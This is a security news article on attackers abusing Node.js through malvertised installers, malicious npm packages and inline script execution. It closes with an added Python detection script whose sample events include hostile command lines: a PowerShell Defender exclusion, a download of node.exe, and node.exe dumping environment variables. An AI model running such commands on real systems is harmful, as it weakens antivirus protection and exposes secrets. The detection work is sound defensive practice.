Attackers are increasingly exploiting Node.js, a widely trusted, open-source JavaScript runtime, to deliver sophisticated malware, steal sensitive data, and compromise entire systems.
Recent campaigns observed since late 2024 have showcased a shift in attacker tactics. They leverage Node.js both for direct script execution and as a vehicle for compiled malware, often bypassing traditional security controls.
Thanks to its cross-platform capabilities and robust ecosystem, Node.js is popular among developers for building scalable front-end and back-end applications.
However, threat actors are now weaponizing these very strengths. Embedding malicious code within Node.js executables or npm (Node Package Manager) packages allows attackers to blend their malware with legitimate applications, evade detection, and persist within target environments.
Attack Vectors and Techniques
Malvertising and Social Engineering
One prominent campaign involves malvertising, placing malicious ads on popular websites to lure users into downloading trojanized installers.
For example, users seeking cryptocurrency trading tools are redirected to fraudulent sites hosting installers built with Node.js and Wix.
These installers contain malicious DLLs, which, upon execution, gather system information using Windows Management Instrumentation (WMI) and establish persistence via scheduled tasks that launch PowerShell commands.
Supply Chain Attacks via npm
Supply chain compromises have surged, with attackers hijacking legitimate npm packages or creating lookalike packages (typosquatting).
Notably, the malicious pdf-to-office npm package targeted crypto wallet software like Atomic Wallet and Exodus.
Once installed, it injects obfuscated JavaScript to intercept and reroute cryptocurrency transactions, exploiting the trusted status of these packages and the Electron framework’s architecture.
Threat actors use tools like the pkg npm module to package Node.js applications into standalone Windows executables.
The NodeLoader malware family exemplifies this trend, delivering second-stage payloads such as XMRig cryptocurrency miners and information stealers like Lumma and Phemedrone Stealer.
NodeLoader leverages the sudo-prompt module for privilege escalation and hides its activities by creating hidden directories and obfuscated PowerShell scripts.
Inline Script Execution
Emerging techniques include direct execution of malicious JavaScript via Node.js in the command line.
Attackers use PowerShell to download the Node.js binary (node.exe) and execute JavaScript that performs network discovery, credential theft, and persistence by modifying registry run keys.
Command-and-control (C2) communications are disguised as legitimate traffic, often using Cloudflare tunnels.
Microsoft reports that the attack chain involves initial access where the user downloads a malicious installer from a fake cryptocurrency platform.
Further, the installer loads a DLL, collects system info via WMI, and sets up a scheduled task for a PowerShell command. The PowerShell commands exclude processes and directories from antivirus scanning.
Obfuscated scripts gather Windows, BIOS, and user data, sending it in JSON format to a remote C2 server via HTTP POST.
Additional scripts fetch and execute Node.js binaries and compiled JavaScript files (JSC), which launch further malicious routines—such as credential theft and browser data exfiltration.
- Uncommon as a Malware Platform: Few antivirus signatures exist for Node.js-compiled binaries, especially those exceeding 35MB in size.
- Obfuscation & Legitimate Appearance: Malicious scripts are often minified and obfuscated, making static analysis difficult. Attackers also mimic legitimate software to avoid suspicion.
- Supply Chain Complexity: npm’s dependency structure allows a single compromised package to infect thousands of downstream applications.
Mitigation Strategies
- Warn against downloading software from unverified sources.
- Flag unauthorized node.exe executions.
- Enable script block and module logging.
- Use EDR/XDR solutions to monitor script execution and block suspicious activity.
- Implement firewall rules to block known malicious domains and suspicious C2 traffic.
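The following script is an added example, not code from the original article or from Microsoft's guidance. It applies the detection ideas listed above to constructed process-creation events in a Sysmon-style field layout (assumed field names: Image, ParentImage, CommandLine), flagging node.exe launched from outside an assumed trusted install directory, node.exe spawned by PowerShell or given inline script, PowerShell adding Defender exclusions, and PowerShell fetching a Node.js binary.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style); not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Program Files\nodejs\node.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Program Files\nodejs\node.exe" C:\dev\app\server.js'},
    {"Image": r"C:\Users\alice\AppData\Local\Temp\node.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'C:\Users\alice\AppData\Local\Temp\node.exe -e "console.log(process.env)"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"powershell.exe -w hidden Add-MpPreference -ExclusionPath C:\Users\alice\AppData\Roaming\svc"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell.exe Invoke-WebRequest https://example.invalid/node.exe -OutFile $env:TEMP\node.exe"},
]

# Assumed: the only places a sanctioned Node.js runtime is installed in this environment.
TRUSTED_NODE_DIRS = ("c:\\program files\\nodejs\\", "c:\\program files (x86)\\nodejs\\")

def classify(event):
    """Return the names of the detection rules that fire for one process-creation event."""
    image, parent, cmd = (event["Image"].lower(), event["ParentImage"].lower(), event["CommandLine"].lower())
    hits = []
    if image.endswith("\\node.exe"):
        # Rule 1: node.exe running outside the expected install directory (a dropped copy).
        if not image.startswith(TRUSTED_NODE_DIRS):
            hits.append("node_unexpected_path")
        # Rule 2: node.exe spawned by PowerShell, as in the inline-script chain described above.
        if parent.endswith("\\powershell.exe") or parent.endswith("\\pwsh.exe"):
            hits.append("node_spawned_by_powershell")
        # Rule 3: JavaScript passed inline on the command line instead of as a script file.
        if re.search(r"\s(-e|--eval)\s", cmd):
            hits.append("node_inline_eval")
    elif image.endswith("\\powershell.exe") or image.endswith("\\pwsh.exe"):
        # Rule 4: PowerShell adding Defender path/process/extension exclusions.
        if "add-mppreference" in cmd and re.search(r"-exclusion(path|process|extension)", cmd):
            hits.append("defender_exclusion_added")
        # Rule 5: PowerShell downloading a Node.js binary from the network.
        if "node.exe" in cmd and re.search(r"invoke-webrequest|downloadfile|start-bitstransfer|\biwr\b|\bcurl\b", cmd):
            hits.append("powershell_downloads_node")
    return hits

def scan(events):
    """Map each suspicious event's command line to the rules it triggered; benign events are omitted."""
    return {e["CommandLine"]: hits for e in events if (hits := classify(e))}
```

Running `scan(SAMPLE_EVENTS)` returns three flagged events; the first sample (node.exe from its install directory, launched by Explorer with a script file) produces no finding.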
The abuse of Node.js for malware delivery and data theft marks a significant evolution in cyberattack methodologies.
As attackers grow more adept at blending malicious code with trusted platforms, organizations must enhance monitoring, update vulnerable dependencies, and educate users to defend against these emerging threats.